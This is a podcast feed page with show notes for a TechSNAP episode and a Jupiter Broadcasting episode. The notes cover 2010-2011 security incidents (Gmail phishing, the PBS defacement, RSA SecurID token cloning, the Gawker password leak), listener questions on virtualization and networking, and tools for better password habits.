The post Hijacking the News | TechSNAP 8 first appeared on Jupiter Broadcasting.

]]>

Google has confirmed that 100s of Gmail accounts were being snooped on, and the targets of this attack are not happy!

The cookie catastrophe in the UK continues, we’ll share the brutal details!

And Find out about the hack that leaked the truth about Tupac.

Plus some great audience submitted questions, and our answers!

Please send in more questions so we can continue doing the Q&A section every week! techsnap@jupiterbroadcasting.com

---

Direct Download Links: HD Video | Large Video | Mobile Video | MP3 Audio | OGG Audio | YouTube

Subscribe via RSS and iTunes:
Subscribe... --RSS-- TechSNAP HD TechSNAP Large TechSNAP Mobile TechSNAP MP3 TechSNAP OGG --iTunes-- TechSNAP iTunes HD TechSNAP iTunes Mobile TechSNAP iTunes Large TechSNAP iTunes MP3

[ad#shownotes]

Show Notes:

Topic: 100s of GMail accounts hacked from China

• Users were all victims of a phishing scam
• Attackers used stolen passwords and setup forwarding and delegation to be able to spy on all current and future mail for that account, even if the password was changed
• Google stresses “It’s important to stress that our internal systems have not been affected—these account hijackings were not the result of a security problem with Gmail itself.”
• Targets seemed to be politically motivated, going after government officials and journalists

---

Topic: PBS website hacked

• LulzSec, one of the hacker groups from the Sony attacks we discussed last night, managed to gain access to several areas of the PBS website.
• They published the user login information they were able to siphon from the database
• They were able to posted fake news stories and could have causes serious harm (however their story was that rapped Tupac Shakur was still alive and living in New Zealand)
• If they had published specially crafted news stories, they could have infected the computers of visitors to the site, or have caused havoc on the stock market by falsely reporting news about various companies.
• LulzSec says the attack was in protest about a PBS Frontline episode that was critical of WikiLeaks

---

Topic: I told you so

https://yro.slashdot.org/story/11/05/27/2249210/BBC-Site-Uses-Cookies-To-Inform-Visitors-of-Anti-Cookie-Law

• In order to comply with a new UK law governing website cookies, when you visit some BBC websites such as radiotimes.com you will be presented with a message telling you about the new law. This message uses a cookie to remember that it has been displayed to you, and will not appear next time you visit the site, to avoid annoying you.
• This means they are using a cookie, to tell you about how they are not going to use cookies without your consent.
• In the future, without the use of something like the google/mozilla ‘do not track’ system, users who decline to accept a cookie will be prompted with such warnings every time, because there will be no way to store their acceptance of the agreement to accept cookies, without using a cookie.
• This is why this issue should have been left to the users and the browsers manufactures, who already have the issue well in hand with security settings, private browsing modes, and the do-not-track system.
• This law will become effectively unenforceable

---

Topic: Defense Contractor Lockheed Martin compromised by duplicate RSA SecureID Tokens

• Attacks broke in to the secure networks of Lockheed Martin and other government contractors by creating duplicates of RSA SecureID Tokens
• It is not clear what data may have been taken. It is unlikely that this information will ever be released by Lockheed Martin because it is likely highly sensitive.
• RSA SecureID is a two-factor authentication system. It is designed to thwart key-loggers and similar attacks by combining the usual username/password combination with a dynamic token they changes every few seconds.
• Senior defense officials claim that while contractors networks contain sensitive data, all classified data is on a separate, closed networks managed by the U.S. government
• The pentagon also uses RSA SecureID tokens, but declined to say how many
• Apparently the hackers learned how to duplicate the SecureID tokens using formation stolen during the Advanced Persistant Threat attacks of RSA that we discussed in episode 002 of TechSNAP
• The RSA attack was followed by targeted malware and phishing attacks on customers who used the RSA SecureID system in an effort to collection the information necessary to duplicate the SecureID Tokens
• This raises questions about the RSA SecureID system, can it be fixed or does the entire system need to be redesigned. It seems that it is far too easy to duplicate the SecureID tokens.

---

Q: (Swadhin) What are the differences between the virtualization that we do on our home pc and the virtualization  that you people do on enterprise servers
A: Mostly the virtualization used in enterprises is the same as what you can do on your home PC. One of the main differences is that in an enterprise, they will have many different servers hosting the virtualized systems, but they will all use what is called ‘shared storage’. Usually something like iSCSI. This does not mean that all of the virtual disks reside on the same physical drive, just that they are accessible in a single place. The advantage to this system is that it becomes possible to ‘migrate’ a virtual machine from one physical host to another, without rebooting the virtual machine. The disk is not moved at all, so all that happens is the memory footprint is transferred between the first host and a second host. Then the virtual machine is paused, and any changes in the memory footprint are synchronized, and the virtual machine is unpaused on the new host. This allows for individual physical host machines to be shutdown for maintenance without taking down the virtual machines hosted there. It also allows for load balancing, if a few virtual machines on the same physical host are very busy, one or more of them can be moved to other less busy hosts to maintain the highest possible performance. Another feature of this system is to allow you to maximize the efficiency of your hardware. Some physical machines can be turned off when the load level is lower, and then if the currently running machines are approaching their maximum load levels, you can turn some more physical machines on, and have the load balanced to them. Then when the load levels fall again, you can turn some physical machines back off. This reduces your power usage, and makes sure you don’t have a bunch of servers just sitting around idle wasting electricity and running up your cooling bill.

---

Q: (Alexander) I am building a new home network for my roommates and I at college, we plan to build a virtualization server as described on the ‘build your own cloud’ episode of LAS. I have a few questions:

1. Should I buy a managed or an unmanaged switch

A: Likely you do not need a managed switch. Managed switches provide features like ‘VLANs’, a way to basically break the switch up in to logical groups of ports, and simulate having multiple separate switches (that can even span between physical switches). This functionality is good for keeping different parts of the network separate (like having a DMZ to put your servers in, and then separate internal LANs), but is likely unnecessary in your setup. You can save your self 100s of dollars by just getting an unmanaged switch.

1. Should I build a virtualization server and a storage server or one that functions as both?

A: The advantage to having the storage server setup, if you use something like iSCSI for the storage system, is the ability to move the virtual machines between physical hosts. This is really only helpful if you have more than 1 virtualization server, so again, you can probably save money by building only a single server.

1. How much power would you think a system like this would draw?

A: That depends, you would be able to see that in the specs for the server when you go to buy it, but overall not that much. Hard drives draw fairly little power, and a quad core processor is usually between 94 and 135 watts, unless you get a lower power version. Servers also tend to have higher efficiency power supplies, at least 80% efficient, so less of the power draw is exhausted as waste heat.

1. How would I run multiple web servers in my network and have them all accessible to the outside world with only one external IP address?

A: If you only have a single external IP, your options are fairly limited. Either you run each web server on a different port, which is cumbersome to the users, or you use a reverse proxy to do virtual hosting. All web servers are capable of doing Virtual Hosting, that is, serving a different page based on the ‘Host’ header that the user’s browser sends when they visit a website. The idea here would be to setup something like NGINX or LigHTTPd to listen on your single ip, and then route the connection to the right internal web server based on the hostname or path that is being requested. This solution also works for routing different parts of a website to different internal servers while maintaining a single ‘domain’, which can be important for cookies, javascript and flash ‘same domain’ policies.
Reverse Proxy: https://nginx.org/

---

User submitted War Story:
(StayFrosty) I was building a new Windows 2008R2 server for a small business client of mine. The machine was little more than a glorified desktop, but it had a support contract. After installing the OS I started installing the drivers, and noticed that there was a BIOS update. I figured since the machine was not in production yet, I might as well install that too. During the flashing process, one of the steps failed. I flipped the KVM over to use a different machine to research the problem, while doing so, I heard the fans in the server spin down and then back up. The machine had rebooted automatically to install some windows updates. When I flipped the KVM back, nothing but a black screen. Luckily, when I contacted the hardware provider, they told me about the BIOS recovery jumper and I was able to get the machine back online.

Download & Comment:

The post Hijacking the News | TechSNAP 8 first appeared on Jupiter Broadcasting.

]]> https://original.jupiterbroadcasting.net/4106/gawker-hacked-jn-121510/ Wed, 15 Dec 2010 22:32:53 +0000 https://original.jupiterbroadcasting.net/?p=4106 Gawker's recent bad luck spells real trouble for Chris! He'll share his tale of woes in tonight's show. Plus some great tools to improve your password habits!

The post Gawker Hacked | J@N | 12.15.10 first appeared on Jupiter Broadcasting.

]]>

Gawker’s recent bad luck spells real trouble for Chris! He’ll share his tale of woes in tonight’s show. Plus some great tools to improve your password habits!

Show Feeds:

• HD Video RSS
• Large Video RSS
• iPod Video RSS
• MP3 RSS
• iTunes Feeds

Download:

Gawker Account Information Compromised
https://www.wired.com/threatlevel/2010/12/gawker-hacked/
https://thenextweb.com/media/2010/12/13/gawker-hackers-release-file-with-ftp-author-reader-usernamespasswords/

A ridiculously comprehensive write-up and follow-up editorial
https://blogs.forbes.com/firewall/2010/12/13/the-lessons-of-gawkers-security-mess/

WAS I HACKED?
https://www.slate.com/id/2277768/

Top  50 Gawker User Passwords – LOL

Is it a hacking TREND?
https://www.fastcompany.com/1709836/expert-hackers-might-be-in-a-pissing-contest-companies-should-be-on-red-alert
McDonald’s, DeviantART and Walgreens now also on the “been hacked” list

Was it 4chan’s users?  Apparently not…
https://techshrimp.com/2010/12/13/gawker-website-hacked-by-gnosis-gnosis-says-they-are-not-4chan-or-anonymous/

Interview with a group named “Gnosis” that is claiming responsibility
https://thenextweb.com/media/2010/12/14/an-interview-with-gnosis-the-group-behind-the-gawker-hacking/

PREVENTION

LastPass can generate random passwords and remember them for you
https://lastpass.com/

SuperGen Pass

Something you have, something you know: Yubikey

Get CRAZY with your passwords: https://www.grc.com/passwords.htm

Download:

The post Gawker Hacked | J@N | 12.15.10 first appeared on Jupiter Broadcasting.

]]>